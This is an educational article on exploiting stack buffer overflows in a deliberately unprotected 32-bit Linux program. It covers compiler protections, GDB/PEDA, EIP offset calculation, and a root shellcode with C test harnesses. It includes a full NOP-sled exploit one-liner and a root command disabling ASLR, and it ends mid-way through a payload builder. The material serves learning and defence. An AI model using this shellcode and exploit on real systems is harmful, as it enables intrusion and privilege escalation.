The PWN realm. Modern techniques for stack overflow exploitation

The buffer overflow vulnerability is an extremely popular topic on hackers’ forums. In this article, I will provide a universal, practice-oriented ‘introduction’ for enthusiasts studying the basics of low-level exploitation. Using stack overflow as an example, I will address a broad range of topics: from the security mechanisms currently used by the GCC compiler to the specifics of binary exploits for stack overflows.

I bet you were taught that strcpy is an unsafe function: with it, you may write beyond the memory allocated for the destination buffer. Visual Studio probably even nagged you to use strcpy_s instead, right? But why exactly is strcpy unsafe? What may happen if you use it? And how can vulnerabilities of the “Stack-Based Buffer Overflow” class be exploited? The answers are below.

This article covers the following aspects:

  • protection mechanisms used in the GCC compiler and Linux OS;
  • GDB debugger in combination with PEDA toolkit;
  • analyzing assembler code compiled with various compilation options;
  • creating and testing shellcodes;
  • developing exploits for executable files vulnerable to stack overflow: overwriting the return address, injecting a payload into the stack, and creating NOP sleds;
  • using core dumps to exploit the vulnerability outside of the debugging environment; and
  • analyzing the new prologue of the main function and creating an exploit that can be used if the program is compiled without the flag -mpreferred-stack-boundary=2.

overflow.c

Here is the source code written in C. The file name is overflow.c, and the program does two simple things: it copies the string received from the user into a local buffer and displays the buffer content on the screen. What’s wrong with it?

  • file: overflow.c
  • compilation: gcc -g -Wall -Werror -O0 -m32 -fno-stack-protector -z execstack -no-pie -Wl,-z,norelro -mpreferred-stack-boundary=2 -o overflow overflow.c
  • run: ./overflow
#include <stdio.h>
#include <string.h>

int main(int argc, char* argv[]) {
  // 128-byte char array
  char buf[128];
  // copying first argument to buf array
  strcpy(buf, argv[1]);
  // displaying buffer content on the screen
  printf("Input: %s\n", buf);
  return 0;
}

As you have probably guessed, all the problems stem from the strcpy function, whose prototype is declared in the header file string.h.

char *strcpy (char *dst, const char *src);

strcpy

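The strcpy function copies the content of the src character array (hereinafter, the “string”), including its terminating null byte, into the dst buffer prepared in advance. So what’s the problem? The problem is that strcpy knows nothing about the size of dst: it keeps copying until it reaches the null byte in src, regardless of how much memory was allocated for the destination. If the string is longer than the buffer, the extra bytes overwrite whatever lies next to the buffer in memory.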
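
To make the problem concrete, here is a toy Python model of strcpy’s semantics (a sketch, not real memory): a bytearray stands in for main’s stack frame, assuming the layout produced by the compilation options used in this article (the 128-byte buf, then the saved EBP, then the return address). The function name toy_strcpy and the placeholder return address are hypothetical.

```python
# Toy model of main's stack frame (assumed layout for this article's build):
#   bytes [0, 128)   -> buf
#   bytes [128, 132) -> saved EBP
#   bytes [132, 136) -> return address
BUF_SIZE = 128
FRAME_SIZE = BUF_SIZE + 4 + 4


def toy_strcpy(memory: bytearray, dst: int, src: bytes) -> None:
    """Copy src plus a terminating NUL to memory[dst:], like strcpy does.

    Note what is missing: the size of the destination is never consulted.
    (Python still bounds-checks the bytearray itself, so writing past
    FRAME_SIZE raises IndexError instead of corrupting other data.)
    """
    for i, byte in enumerate(src + b"\x00"):
        memory[dst + i] = byte
        if byte == 0:  # strcpy stops right after copying the first NUL
            break


frame = bytearray(FRAME_SIZE)
frame[132:136] = (0x08048500).to_bytes(4, "little")  # hypothetical return address

toy_strcpy(frame, 0, b"B" * 127)   # 127 chars + NUL = 128 bytes: fits into buf
print(frame[132:136].hex())        # 00850408 (return address intact)

toy_strcpy(frame, 0, b"A" * 135)   # 135 chars + NUL = 136 bytes: overflows buf
print(frame[132:136].hex())        # 41414100 (return address clobbered)
```

The second call shows the pattern exploited in the rest of the article: the bytes that do not fit into buf first overwrite the saved EBP and then the return address.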

In most cases, the compiler places the local (automatic) variables of a function on the call stack (or just “stack”), so it is logical to assume that potential attackers will target the stack: if you manage to write beyond the legitimate memory limits, you can do almost anything. After all, “to get full control over the system, you must go beyond its boundaries.”

Compilation

Before examining the stack of this program and disassembling it, let’s see which options I use to compile it.

I will use Ubuntu 16.04.6 (i686) and GCC compiler v. 5.4.0. The kernel version output is as follows.

$ uname -a
Linux pwn-ubuntu 4.15.0-58-generic #64~16.04.1-Ubuntu SMP Wed Aug 7 14:09:34 UTC 2019 i686 i686 i686 GNU/Linux

For the purposes of this study, I intentionally disarm the compiler by disabling all the mechanisms that protect control-flow integrity.

$ gcc -g -Wall -Werror -O0 -m32 -fno-stack-protector -z execstack -no-pie -Wl,-z,norelro -mpreferred-stack-boundary=2 -o overflow overflow.c

I use the following flags:

  • -g – instructs the compiler to include extra information in the output to facilitate the debugging process;
  • -Wall -Werror – -Wall enables warnings about potentially incorrect constructs in the program, and -Werror turns these warnings into errors, making the compilation fail (by the way, the above example is fine, so the compiler stays silent);
  • -O0 – disables code optimization to maintain the experimental integrity;
  • -m32 – specifies that I need a 32-bit executable file. In this particular case, this option is not necessary because I use a 32-bit distribution, and by default, the binary file will be 32-bit, too; however, I include this flag for illustration purposes;
  • -fno-stack-protector – disables the protection against stack smashing, one of the typical scenarios of buffer overflow exploitation. The protection slightly extends the stack frame in order to place a randomly generated value unknown to the attacker directly before the return address (it is called a guard variable or canary, by analogy with the canaries used to detect firedamp in mines). If this value has changed by the time the function returns, it is very likely that the stack has been overwritten and the return address is corrupted or altered, so the program execution is aborted;
  • -z execstack – an option that GCC passes to the linker; the execstack keyword marks the stack as executable, i.e. instructions stored in the stack can be executed. Such behavior was acceptable on some architectures and was relied upon, for example, by the trampolines GCC generates for nested functions. I am going to use this feature to execute a malicious shellcode injected into the stack space;
  • -no-pie – tells GCC not to build a position-independent executable (PIE). A PIE can be loaded at a random base address when address space layout randomization (ASLR) is active; I will disable ASLR system-wide a bit later;
  • -Wl,-z,norelro – passes -z norelro to the linker, disabling RELRO (Relocation Read-Only). RELRO makes relocated data such as the Global Offset Table (GOT) read-only after the dynamic loader has filled in the addresses from the shared libraries, so that these entries cannot be overwritten later;
  • -mpreferred-stack-boundary=2 – sets the alignment of stack frame boundaries. Data alignment speeds up the processor’s memory accesses by keeping the stack pointer at an address that is a multiple of a certain number. This number is 2^n, where n is set by the -mpreferred-stack-boundary=n option. By default, n equals 4 on modern systems; in other words, GCC builds stack frames so that ESP in all program functions points to addresses that are multiples of 16 (2^4). Initially, I will use the value 2, so GCC will align the stack pointer to a four-byte boundary. I use this option to make the assembly listing more readable: the 16-byte alignment makes GCC generate a new, much harder-to-read prologue for the main function. However, at the end of this article, I will show what exactly changes when this option is omitted and perform the exploitation without it;
  • -o overflow – the name of the output file; and
  • overflow.c – the source code to be compiled.
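
The alignment rule from the -mpreferred-stack-boundary item boils down to simple bit arithmetic. The sketch below (the function name align_down and the ESP value are hypothetical) rounds an address down to a 2^n boundary, which is what an instruction such as and esp,0xfffffff0 does for n = 4.

```python
def align_down(addr: int, n: int) -> int:
    """Round a 32-bit address down to a multiple of 2**n.

    Clearing the low n bits is exactly what `and esp, -(2**n)` does;
    for n = 4 the mask is 0xfffffff0.
    """
    mask = (1 << n) - 1
    return addr & ~mask & 0xFFFFFFFF


esp = 0xBFFFEE1C                     # hypothetical ESP value
print(hex(align_down(esp, 4)))       # 0xbfffee10 (16-byte boundary, the default)
print(hex(align_down(esp, 2)))       # 0xbfffee1c (already on a 4-byte boundary)
print(hex(0xFFFFFFFF & -(1 << 4)))   # 0xfffffff0, the mask for n = 4
```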

In fact, I don’t really need such a long list of arguments to demonstrate stack overflow exploitation. The required minimum includes only -fno-stack-protector and -z execstack. However, I intentionally listed as many of GCC’s mechanisms protecting executable files as possible. In the coming articles, I will address these protection concepts in more detail and show how to bypass them.

The last thing I have to do at the preparation stage is disable ASLR. This requires superuser rights and involves changes in one of the procfs kernel configuration files.

# echo 0 > /proc/sys/kernel/randomize_va_space
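
The value written to randomize_va_space selects the ASLR mode (and, since it is written to procfs, it does not survive a reboot). As a small sketch (the helper names are hypothetical; the meaning of the values follows the Linux kernel’s sysctl documentation), the setting can be read and interpreted like this:

```python
from pathlib import Path

# Meaning of the /proc/sys/kernel/randomize_va_space values
ASLR_MODES = {
    0: "disabled: no address space randomization",
    1: "conservative: stack, mmap base (hence shared libraries) and VDSO are randomized",
    2: "full: as 1, plus the heap (brk area)",
}


def describe_aslr(raw: str) -> str:
    """Translate the raw contents of randomize_va_space into a description."""
    mode = int(raw.strip())
    return ASLR_MODES.get(mode, f"unknown mode {mode}")


def current_aslr(path: str = "/proc/sys/kernel/randomize_va_space") -> str:
    """Read the current setting (Linux only)."""
    return describe_aslr(Path(path).read_text())


if __name__ == "__main__":
    # After the echo above, this should start with "disabled"
    print(current_aslr())
```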

Stack

Let’s recall the classical scheme showing the data layout in a stack, using the above-mentioned vulnerable source code as an example.

Stack layout for the main overflow.c function

The two key processor registers involved in the stack frame formation are ESP and EBP.

  • ESP is a general-purpose register pointing to the top of the stack at any time. As you are well aware, the stack grows downward: when an item is pushed onto it, the ESP value decreases; when an item is popped from it, the ESP value increases.
  • EBP is a general-purpose register pointing to the base of the current stack frame; it serves as the origin of a reference system tied to the current frame. EBP is set in the function prologue and restored in the epilogue. Unlike ESP, which is also changed implicitly by instructions such as push, pop, call, and ret, EBP is modified only by explicit instructions in the program’s code. Any item in the stack frame (be it a local variable or a function argument) can be accessed using addressing in the format base (EBP) + offset.

It is also necessary to mention the EIP register: it points to the instruction currently executed by the processor. The return address is the EIP value saved on the stack by the call instruction (the address of the instruction following the call). When the function completes, the ret instruction pops this value back into EIP, telling the processor where to continue execution.

Assembler

Time to examine the assembler code generated by the compiler. I compile overflow.c using the above command and launch the GDB debugger.

To get the assembly code listing, I use the following one-liner.

$ gdb -batch -ex 'set disassembly-flavor intel' -ex 'file ./overflow' -ex 'disas main'

The -batch option indicates that the commands must be executed without starting an interactive debugging session. The commands are passed as arguments of the -ex option: switch to Intel syntax, open the file, and disassemble main. As a result, I get the following assembler code in Intel syntax.

Dump of assembler code for function main:
   0x0804841b <+0>:     push   ebp
   0x0804841c <+1>:     mov    ebp,esp
   0x0804841e <+3>:     add    esp,0xffffff80
   0x08048421 <+6>:     mov    eax,DWORD PTR [ebp+0xc]
   0x08048424 <+9>:     add    eax,0x4
   0x08048427 <+12>:    mov    eax,DWORD PTR [eax]
   0x08048429 <+14>:    push   eax
   0x0804842a <+15>:    lea    eax,[ebp-0x80]
   0x0804842d <+18>:    push   eax
   0x0804842e <+19>:    call   0x80482f0 <strcpy@plt>
   0x08048433 <+24>:    add    esp,0x8
   0x08048436 <+27>:    lea    eax,[ebp-0x80]
   0x08048439 <+30>:    push   eax
   0x0804843a <+31>:    push   0x80484d0
   0x0804843f <+36>:    call   0x80482e0 <printf@plt>
   0x08048444 <+41>:    add    esp,0x8
   0x08048447 <+44>:    mov    eax,0x0
   0x0804844c <+49>:    leave
   0x0804844d <+50>:    ret
End of assembler dump.

A similar result can be obtained using objdump, a utility that displays (and disassembles) the contents of object files.

$ objdump -M intel -d ./overflow | grep '<main>:' -A19

Let’s examine the code in more detail.

0x0804841b <+0>:  push ebp
0x0804841c <+1>:  mov  ebp,esp
0x0804841e <+3>:  add  esp,0xffffff80  ; equivalent to "sub esp,0x80"

The first three lines constitute the classical prologue where the stack frame is created: the caller’s EBP value is saved on the stack, and EBP is then set to the current top of the stack (ESP). As a result, a so-called ‘comfort zone’ is created: local variables and arguments can be addressed at fixed offsets from EBP, regardless of what the function later does with ESP. In addition, space for local variables is allocated here: adding 0xffffff80, which is -128 in 32-bit two’s complement, to ESP is the same as subtracting 128 from it (this is exactly what I need for the 128-byte buf buffer).
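
Why add 0xffffff80 rather than subtract 0x80? The immediate is interpreted as a signed 32-bit number, and -128 fits into a sign-extended 8-bit immediate while +128 does not, which is presumably why the compiler chose this 3-byte encoding (note the addresses 0x0804841e and 0x08048421 in the listing). A quick Python check of the arithmetic (the ESP value is hypothetical):

```python
def to_signed32(value: int) -> int:
    """Interpret a 32-bit pattern as a two's-complement signed integer."""
    value &= 0xFFFFFFFF
    return value - (1 << 32) if value & 0x80000000 else value


imm = 0xFFFFFF80
print(to_signed32(imm))  # -128

esp = 0xBFFFEE60                        # hypothetical ESP right after `mov ebp,esp`
after_add = (esp + imm) & 0xFFFFFFFF    # add esp,0xffffff80 (wraps modulo 2**32)
after_sub = (esp - 0x80) & 0xFFFFFFFF   # sub esp,0x80
print(after_add == after_sub, hex(after_add))  # True 0xbfffede0
```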

0x08048421 <+6>:  mov  eax,DWORD PTR [ebp+0xc]  ; eax = argv
0x08048424 <+9>:  add  eax,0x4                  ; eax = &argv[1]
0x08048427 <+12>: mov  eax,DWORD PTR [eax]      ; eax = argv[1]
0x08048429 <+14>: push eax                      ; prepare "src" argument for strcpy function 

Then the program prepares to call the strcpy function. Under the cdecl calling convention, arguments are pushed from right to left, so the ‘source’ (the src argument from the strcpy prototype) goes first: the pointer to the user-supplied string stored in argv[1] is loaded into the EAX register (argv[0] holds the name of the executable file), and the register value is pushed onto the stack. The pointer to the argv array is located at offset 12 (0xc) from EBP, above the saved EBP (EBP+0), the return address (EBP+4), and the argc parameter (EBP+8).

0x0804842a <+15>: lea  eax,[ebp-0x80]  ; eax = buf
0x0804842d <+18>: push eax            ; prepare "dst" argument for strcpy function

Then similar operations are performed for the ‘destination’, i.e. the dst argument from the strcpy prototype: the address of the beginning of the buf array (EBP-0x80) is loaded into the EAX register. The lea (load effective address) instruction computes this address ‘on the fly’ without accessing memory and puts it into the register.

0x0804842e <+19>: call 0x80482f0 <strcpy@plt>  ; strcpy(dst, src), i.e. strcpy(buf, argv[1])
0x08048433 <+24>: add  esp,0x8                 ; remove both 4-byte arguments from the stack

Now everything is ready: I can call the strcpy function and clear the stack of the two values that are not needed anymore: src and dst.

0x08048436 <+27>: lea  eax,[ebp-0x80]          ; eax = buf
0x08048439 <+30>: push eax                     ; prepare "buf" argument for printf function
0x0804843a <+31>: push 0x80484d0               ; push the address of the format string "Input: %s\n"
0x0804843f <+36>: call 0x80482e0 <printf@plt>  ; printf("Input: %s\n", buf)
0x08048444 <+41>: add  esp,0x8                 ; remove both 4-byte arguments from the stack

Then arguments are prepared in a similar way for the function that prints the input string on the screen.

0x08048447 <+44>: mov  eax,0x0  ; eax = 0x0

By convention, EAX holds the function’s return value, so it is set to zero here to implement return 0.

And finally, here comes the epilogue. It is the epilogue that makes it possible to hijack the program’s control flow.

0x0804844c <+49>: leave  ; mov esp,ebp; pop ebp
0x0804844d <+50>: ret    ; pop eip (eip = [esp]; esp += 4)

As you can see, leave is equivalent to the pair of instructions mov esp,ebp; pop ebp. This operation rolls back everything that was done during the stack frame creation: mov esp,ebp discards the local variables, pop ebp restores the caller’s EBP, and after that the top of the stack holds the return address. Then the ret instruction is executed: it pops the top value of the stack into the EIP register, assuming that this is the saved return address to the caller function, jumps to this address suspecting nothing wrong, and everything is supposed to resume its normal course… but this is where I enter the game!
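
The effect of the epilogue can be modelled in a few lines of Python. In this toy sketch (not an emulator), memory is a dict mapping addresses to 32-bit values, and the EBP value is hypothetical; it shows that whatever occupies EBP+4 when leave; ret runs becomes the new EIP.

```python
def leave_ret(mem: dict, esp: int, ebp: int) -> tuple:
    """Return (eip, esp, ebp) after executing `leave; ret` on i386."""
    # leave = mov esp,ebp ; pop ebp  (the incoming ESP is simply discarded)
    esp = ebp
    ebp = mem[esp]
    esp += 4
    # ret = pop eip
    eip = mem[esp]
    esp += 4
    return eip, esp, ebp


EBP = 0xBFFFEE58              # hypothetical frame base of main
mem = {
    EBP: 0x41414141,          # saved EBP, already overwritten by the 'A' junk
    EBP + 4: 0xD34DC0D3,      # return address, overwritten by the attacker
}
eip, esp, ebp = leave_ret(mem, esp=EBP - 0x80, ebp=EBP)
print(hex(eip), hex(esp), hex(ebp))  # 0xd34dc0d3 0xbfffee60 0x41414141
```

The corrupted saved EBP (0x41414141) does not matter here: execution never gets back to the caller, so its frame pointer is never used.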

Before examining the exploit structure, I have to briefly describe the GDB debugger, which I used to get the assembly listing, and its extensions.

GDB (PEDA)

GNU Debugger (GDB) is a portable debugger that is part of the GNU Project and supports many programming languages, including C and C++. GDB interacts with the user through a command-line interface (some enthusiasts even use it as a REPL for the C language).

Frankly speaking, I don’t feel comfortable in the bare GDB environment because it doesn’t display context information automatically: you have to enter a separate command for each piece of information (the current state of registers, stack contents, active breakpoints, etc.). Even though almost all GDB commands have one-letter aliases, this is still very tiresome.

Fortunately, the PEDA (Python Exploit Development Assistance for GDB) extension comes to the rescue. This GDB assistant is written in Python and makes the debugger much more user-friendly. As its name suggests, it is mostly used to develop exploits for binary vulnerabilities.

The extension is installed with two commands: I clone the repository and load the assistant in the GDB configuration file.

$ git clone https://github.com/longld/peda.git ~/peda
$ echo "source ~/peda/peda.py" >> ~/.gdbinit

checksec

PEDA includes a wonderful module called checksec. It checks what security mechanisms are currently active for the given executable file.

PEDA checksec

  • CANARY is the stack protector that detects stack smashing by checking a guard value placed before the return address; I disabled it using the -fno-stack-protector option;
  • FORTIFY (enabled with _FORTIFY_SOURCE) is a compiler-assisted protection for functions that write to buffers whose sizes are known at compile time (e.g. fixed-size arrays). The compiler replaces calls to such functions (e.g. strcpy) with calls to checked variants (e.g. __strcpy_chk) and passes them the size of the destination buffer. If a checked function detects that it would write beyond the buffer, the program is immediately terminated;
  • NX (non-executable stack) marks the stack memory as non-executable. I disabled it using the -z execstack option;
  • PIE is a position-independent executable. I disabled it using the -no-pie option (ASLR itself is disabled separately, system-wide); and
  • RELRO is the ‘read-only’ mode for the GOT table. I disabled it using the -Wl,-z,norelro option.

In addition to the GDB extension, such checks can be performed using a special script.
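
For illustration, here is a minimal standalone sketch of some of these checks in Python (the function name check_elf32 is hypothetical, and this is not how PEDA implements checksec). It parses the program headers of a 32-bit little-endian ELF file: a PT_GNU_STACK entry without the execute flag means NX, the ET_DYN file type indicates PIE (shared libraries have this type too), and a PT_GNU_RELRO entry means RELRO is at least partially enabled. Canary and FORTIFY detection require inspecting the symbol table and are left out.

```python
import struct

PT_GNU_STACK = 0x6474E551
PT_GNU_RELRO = 0x6474E552
PF_X = 0x1          # execute permission flag in p_flags
ET_DYN = 3          # ELF type of PIEs and shared libraries


def check_elf32(data: bytes) -> dict:
    """Report NX, PIE and RELRO for a little-endian ELF32 image.

    NX is None when there is no PT_GNU_STACK header at all.
    Partial and full RELRO are not distinguished.
    """
    if data[:4] != b"\x7fELF" or data[4] != 1 or data[5] != 1:
        raise ValueError("not a little-endian ELF32 file")
    (e_type, _machine, _version, _entry, e_phoff, _shoff, _flags,
     _ehsize, e_phentsize, e_phnum, _shentsize, _shnum, _shstrndx) = \
        struct.unpack_from("<HHIIIIIHHHHHH", data, 16)

    nx, relro = None, False
    for i in range(e_phnum):
        # p_type, p_offset, p_vaddr, p_paddr, p_filesz, p_memsz, p_flags, p_align
        p_type, *_middle, p_flags, _align = struct.unpack_from(
            "<IIIIIIII", data, e_phoff + i * e_phentsize)
        if p_type == PT_GNU_STACK:
            nx = not (p_flags & PF_X)
        elif p_type == PT_GNU_RELRO:
            relro = True
    return {"NX": nx, "PIE": e_type == ET_DYN, "RELRO": relro}


if __name__ == "__main__":
    import sys
    with open(sys.argv[1], "rb") as f:
        print(check_elf32(f.read()))
```

For the overflow binary built with the options above, I would expect all three checks to come out False, matching the checksec output.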

Developing exploits

Time to overflow some stacks! The main idea of a stack overflow attack is to overwrite the return address – the above-mentioned saved value of the EIP register determining the jump after the execution of a vulnerable function. I am going to inject a malicious shellcode into the stack, calculate its address and replace the original EIP value with this address.

Calculating the EIP offset

In this particular case, I can calculate the location of the return address without using any tools – just by examining the low-level code:

| ...              |  (higher addresses)
+------------------+
| Return address   |  EBP+4
+------------------+
| Saved EBP        |  EBP
+------------------+
| buf (128 bytes)  |  EBP-0x80
+------------------+
| Free space       |
+------------------+
| ...              |  (lower addresses)

Offset to the return address = sizeof(buf) + sizeof(saved EBP) = 128 + 4 = 132 bytes
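
The same calculation can be written down with the EBP-relative offsets that appear in the disassembly of main (buf at ebp-0x80, argv at ebp+0xc); the return address sits right above the saved EBP. A short Python sketch:

```python
# EBP-relative offsets of main's frame, read off the disassembly above
BUF = -0x80        # lea eax,[ebp-0x80]
SAVED_EBP = 0x0    # push ebp; mov ebp,esp
RET_ADDR = 0x4     # pushed by the caller's `call`, just above the saved EBP
ARGC = 0x8         # first argument of main
ARGV = 0xC         # mov eax,DWORD PTR [ebp+0xc]

offset_to_ret = RET_ADDR - BUF      # bytes of input before the return address
payload_len = offset_to_ret + 4     # junk plus the new 4-byte return address
print(offset_to_ret, payload_len)   # 132 136
```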

However, this process can also be automated: a unique string (pattern) of a given length is generated and fed to the vulnerable program. Every 4-byte fragment occurs in the pattern only once, so if the overflow overwrites EIP with a part of the pattern, the new value of this register tells exactly how many bytes of input precede the return address, and a simple script finds this offset.

Several implementations of this approach are currently available. The first one is the pattern module embedded in PEDA. The command pattern create <n> (where <n> is the required length) creates a unique pattern.

I run the debugger with the -q option (which suppresses the startup banner) and generate a 200-byte string to make sure that the stack gets overflowed.

Generating a unique pattern in PEDA GDB

Using the run command (as said above, almost all GDB commands have one-letter aliases for convenience; accordingly, r stands for run), I run the program and pass the generated pattern as an argument.

The run command will be executed after pressing Enter

After the program crashes, I see the nice PEDA context window (‘pure’ GDB without extensions is very laconic) showing the values of all important registers. Then I pass the value that EIP had at the time of the segmentation fault to the pattern module to calculate the offset: pattern offset 0x6c414150.

Calculating offset for the EIP register in PEDA GDB

The result is 132 – so, my earlier assumption was correct.

WWW

Other implementations of such tools are available as online services (Buffer Overflow EIP Offset String Generator and Buffer overflow pattern generator) and scripts. The most popular such script is included in Metasploit.
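
To see how such tools work, here is a compact Python sketch of a Metasploit-style pattern (Aa0Aa1Aa2...: an uppercase letter, a lowercase letter, a digit). The function names mimic the Metasploit scripts but the code is my own, and it is not PEDA’s algorithm: PEDA uses a different character set, so the value 0x6c414150 from the screenshot will not be found in this pattern. The offset must always be looked up with the same generator that produced the input.

```python
import string
import struct


def pattern_create(length: int) -> bytes:
    """Metasploit-style cyclic pattern: Aa0Aa1...Aa9Ab0... (upper, lower, digit)."""
    chunks = []
    for upper in string.ascii_uppercase:
        for lower in string.ascii_lowercase:
            for digit in string.digits:
                chunks.append(upper + lower + digit)
                if len(chunks) * 3 >= length:
                    return "".join(chunks)[:length].encode()
    raise ValueError("pattern too long for this character set")


def pattern_offset(eip: int, length: int = 8192) -> int:
    """Find where the 4 bytes that ended up in EIP start in the pattern (-1 if absent)."""
    needle = struct.pack("<I", eip)  # EIP holds the bytes in little-endian order
    return pattern_create(length).find(needle)


crash_input = pattern_create(200)
# Suppose EIP ended up holding the 4 bytes found at offset 132 of the input:
eip = struct.unpack("<I", crash_input[132:136])[0]
print(hex(eip), pattern_offset(eip))  # 0x41346541 132
```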

Now I know the offset of the return address. What’s next?

There are several ways to inject my shellcode into the stack space, but I must present some theory first.

Shellcodes

In my future exploit, the payload will contain a shellcode: a small piece of machine code (usually written down as a string of hexadecimal escape sequences) enabling me to get access to the command interpreter and/or perform other actions at my discretion.

A shellcode can be

In this particular case, I will use a 33-byte shellcode for Linux x86. It sets the real and effective user IDs of the calling process to zero (root) and launches the shell.

// setreuid(0,0) + execve("/bin//sh", ["/bin//sh", NULL], NULL)

"\x6a\x46\x58\x31\xdb\x31\xc9\xcd\x80\x31\xd2\x6a\x0b\x58\x52"
"\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x52\x53\x89"
"\xe1\xcd\x80"

A simple program written in C makes it possible to test whether the shellcode is indeed executed in your system or not.

// Usage: gcc -fno-stack-protector -z execstack -mpreferred-stack-boundary=2 -o test_shellcode_v1 test_shellcode_v1.c && ./test_shellcode_v1

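#include <stdio.h>
#include <string.h>

// 33-byte setreuid(0,0) + execve("/bin//sh") shellcode from above
const unsigned char shellcode[] =
  "\x6a\x46\x58\x31\xdb\x31\xc9\xcd\x80\x31\xd2\x6a\x0b\x58\x52"
  "\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x52\x53\x89"
  "\xe1\xcd\x80";

int main(int argc, char* argv[]) {
  printf("Shellcode size: %zu\n\n", strlen((const char*)shellcode));

  int* ret;
  // With these compiler options, &ret + 1 is the saved EBP
  // and &ret + 2 is main's return address
  ret = (int*)&ret + 2;
  // Overwrite the return address: the shellcode runs when main returns
  (*ret) = (int)shellcode;
  return 0;
}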

The following simple logic is implemented:

  1. the local variable ret (a pointer to an integer) is declared; in the main stack frame, it is located immediately below the saved EBP value;
  2. adding 2 to an int* pointer moves it 8 bytes further (each int occupies 4 bytes), which skips the saved EBP and lands exactly on the return address; and
  3. the return address (EIP) is overwritten with the address of my shellcode. In fact, I will perform the same operations during the stack overflow exploitation, but this time I do it ‘legitimately’.

Alternatively, I can use another C program that interprets the array containing the shellcode as a function, so I just ‘call’ this ‘function’.

// Usage: gcc -fno-stack-protector -z execstack -mpreferred-stack-boundary=2 -o test_shellcode_v2 test_shellcode_v2.c && ./test_shellcode_v2

#include <stdio.h>
#include <string.h>

// 33-byte setreuid(0,0) + execve("/bin//sh") shellcode from above
const unsigned char shellcode[] =
  "\x6a\x46\x58\x31\xdb\x31\xc9\xcd\x80\x31\xd2\x6a\x0b\x58\x52"
  "\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x52\x53\x89"
  "\xe1\xcd\x80";

int main(int argc, char* argv[]) {
  printf("Shellcode size: %zu\n\n", strlen((const char*)shellcode));

  // Treat the shellcode bytes as a function without arguments and call it
  void (*fp)(void);
  fp = (void (*)(void))shellcode;
  fp();
  return 0;
}

You can use either of these two variants.

Payload before the ESP

GDB starts the program through the shell, so the arguments of the run command can use command substitution; this lets me generate the input with a simple Python one-liner and double-check that I can overwrite the EIP value at my discretion.

Using the break command, I set a breakpoint at the ret instruction (its address is 0x0804844d, see the assembly code listing).

gdb-peda$ b *0x0804844d

Then I run the program and pass as an argument a string consisting of 132 letters A (junk used to reach the return address) followed by a sinister value: 0xd34dc0d3 (‘dead code’). Since x86 is little-endian, the bytes of the address must be written in reverse order, so I reverse the string containing the address using Python slicing: [::-1].

gdb-peda$ r `python -c 'print "A"*132 + "\xd3\x4d\xc0\xd3"[::-1]'`
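
The [::-1] slice in the one-liner is just a manual way of producing the little-endian encoding of the address. In Python 3 (the article’s one-liners use Python 2, where print writes raw bytes), the struct module does the same explicitly; a short sketch:

```python
import struct

RET = 0xD34DC0D3                             # the 'dead code' marker value
packed = struct.pack("<I", RET)              # '<I' = little-endian unsigned 32-bit
print(packed.hex())                          # d3c04dd3
print(packed == b"\xd3\x4d\xc0\xd3"[::-1])   # True: same bytes as the slice trick

payload = b"A" * 132 + packed                # junk up to the return address + new value
print(len(payload))                          # 136
```

To emit such a payload from a Python 3 one-liner, it would have to be written with sys.stdout.buffer.write(payload), since print() on a bytes object outputs its repr rather than the raw bytes.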

Checking values of the registers at the breakpoint set before ret

Because the program stopped before executing the ret instruction, the ‘dead code’ value is on top of the stack (marked by the red frame), i.e. at the address ESP points to, from where ret would have popped it into the EIP register if I hadn’t interrupted the program. Also note that EIP is now equal to the breakpoint address (marked by the blue frame).

Using the x (examine) command, you can inspect any memory region in detail (for instance, the beginning of the buf array at $esp-132) and picture how the shellcode will be laid out on the stack. After the slash, I specify the desired output format: 64wx (64 4-byte words (w) in hexadecimal form (x)).

gdb-peda$ x/64wx $esp-132

Expected stack layout after injecting the shellcode

Let’s examine the above screenshot in more detail.

  • So far, everything located before the 0xd34dc0d3 value shown in the red frame is junk consisting of letters A that will be replaced by more meaningful stuff soon.
  • The orange frame marks the area where the shellcode (33 bytes) will be placed. Since 33 is not a multiple of 4, the last byte of the shellcode spills over into the next word (at address 0xbfffee18) and, due to the little-endian byte order, occupies its least significant byte.
  • The shellcode is surrounded by two 32-byte areas marked by blue frames, the so-called NOP sleds. They eliminate the need to calculate the shellcode address with single-byte accuracy: a sled consists of NOP instructions (no operation, opcode 0x90 on Intel x86) that make the processor do nothing, so if execution ‘jumps’ anywhere into the sled, it ‘slides’ down to the shellcode. As a result, the chance of specifying a wrong address decreases, and the payload gets executed anyway. In addition, on modern systems it is often impossible to determine a static address once and for all: it won’t remain the same at the next launch of the program (because of ASLR and the compiler’s stack alignment behavior, see below). The NOP area after the shellcode simply fills the free space (similar to the junk consisting of letters A), padding the payload to the required length. Also, it is considered good style to leave a small NOP sled immediately after the shellcode (provided that there is enough free space) in case the shellcode needs some additional space during execution.
  • The green frame marks the stack portion filled with junk A characters:

    Junk length = (buf + EBP) - NOP_sled*2 - shellcode = (128 + 4) - 32*2 - 33 = 35 bytes

Using the continue command, I resume the program execution and trigger the ret instruction; as expected, the program crashes with a segmentation fault, and EIP now miraculously contains 0xd34dc0d3.

gdb-peda$ c

Program execution continues

Time to launch the offensive. A crude exploit to be run in the GDB interactive shell looks as shown below (later, I am going to do this in an elegant way and without the need to run a debugger).

gdb-peda$ r `python -c 'print "\x90"*32 + "\x6a\x46\x58\x31\xdb\x31\xc9\xcd\x80\x31\xd2\x6a\x0b\x58\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x52\x53\x89\xe1\xcd\x80" + "\x90"*32 + "A"*35 + "\xbf\xff\xed\xe8"[::-1]'`

The address that overwrites the saved return address (and thus ends up in EIP) is 0xbfffede8: I jump right into the middle of the first NOP sled (see the stack layout screenshot).
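
The structure of this one-liner can be written out as a small, parameterized Python 3 sketch. The function build_payload is hypothetical, the shellcode is passed in as an argument (the example uses placeholder bytes, not real shellcode), and the address 0xbfffede8 is only valid for this particular GDB session. The sketch also rejects NUL bytes, since strcpy would stop copying at the first one.

```python
import struct

OFFSET_TO_RET = 132   # sizeof(buf) + saved EBP, as calculated earlier
NOP = b"\x90"         # x86 NOP opcode


def build_payload(shellcode: bytes, ret_addr: int, sled: int = 32) -> bytes:
    """Lay out: NOP sled | shellcode | NOP sled | 'A' junk | return address."""
    body = NOP * sled + shellcode + NOP * sled
    junk = OFFSET_TO_RET - len(body)
    if junk < 0:
        raise ValueError(f"{len(body)} bytes do not fit before the return address")
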